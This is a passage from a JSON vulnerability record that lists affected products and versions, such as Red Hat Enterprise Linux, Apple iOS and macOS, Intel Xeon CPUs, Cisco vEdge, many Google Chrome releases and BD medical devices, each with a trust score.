enterprise linux server", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7" }, { "model": "hat enterprise linux desktop", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7" }, { "model": "tvos", "scope": "lt", "trust": 0.6, "vendor": "apple", "version": "11.2" }, { "model": "ios", "scope": "lt", "trust": 0.6, "vendor": "apple", "version": "11.2" }, { "model": "xeon cpu e5-1650", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "v3" }, { "model": "hat enterprise linux server tus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7.4" }, { "model": "hat enterprise linux server tus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7.2" }, { "model": "hat enterprise linux server tus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6.6" }, { "model": "hat enterprise linux server aus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7.4" }, { "model": "hat enterprise linux server aus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7.2" }, { "model": "hat enterprise linux server aus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7.3" }, { "model": "hat enterprise linux server aus", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6.6" }, { "model": "macos", "scope": "lt", "trust": 0.6, "vendor": "apple", "version": "10.13.2" }, { "model": "cloud services platform", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2100" }, { "model": "vbond orchestrator", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "vedge cloud", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "vedge", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "5000" }, { "model": "vedge", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2000" }, { "model": "vedge", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "100" }, { "model": "vedge", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1000" }, { "model": "nexus 6p", "scope": null, "trust": 0.6, "vendor": "google", "version": null }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "-47.4" }, { "model": "pixel xl", "scope": "eq", "trust": 0.6, "vendor": "google", "version": "0" }, { "model": "nexus", "scope": "eq", "trust": 0.6, "vendor": "google", "version": "5x" }, { "model": "pixel c", "scope": "eq", "trust": 0.6, "vendor": "google", "version": "0" }, { "model": "android", "scope": "eq", "trust": 0.6, "vendor": "google", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.924.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.110.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1012" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1005.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1039" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.434.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.365.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.879.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.926.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.47255" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.39" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.530.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.58" }, { "model": "facsmelody", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.15" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.633.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.769.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.785.0" }, { "model": "facscanto ii clinical", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.225" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.90" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.385.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.319.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.908.0" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.204" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.374.0" }, { "model": "pyxis ecostation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.23" }, { "model": "facscanto ii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.40" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1043" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.604.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.756.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.34" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.123" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.233" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.955.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.760.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.368.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.594.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.118" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.743.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.97" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96365" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357.130" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "63.0.3239.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.816.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.393.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.362.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.618.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.628.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.815.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.423.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.802.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.323.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.804.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.370.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.805.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.789.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.32" }, { "model": "totalys slideprep", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.315" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.512.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.109" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.5" }, { "model": "simatic ipc427e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.901.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.729.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.23" }, { "model": "chrome os beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.130.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.483.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.467.0" }, { "model": "phoenix", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "1000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.10" }, { "model": "facslink interface", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.25" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.128.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1017" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.727.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.748.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.379.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.654.0" }, { "model": "phoenix m50", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.334.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.0" }, { "model": "facsjazz", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.303" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.91" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.90" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 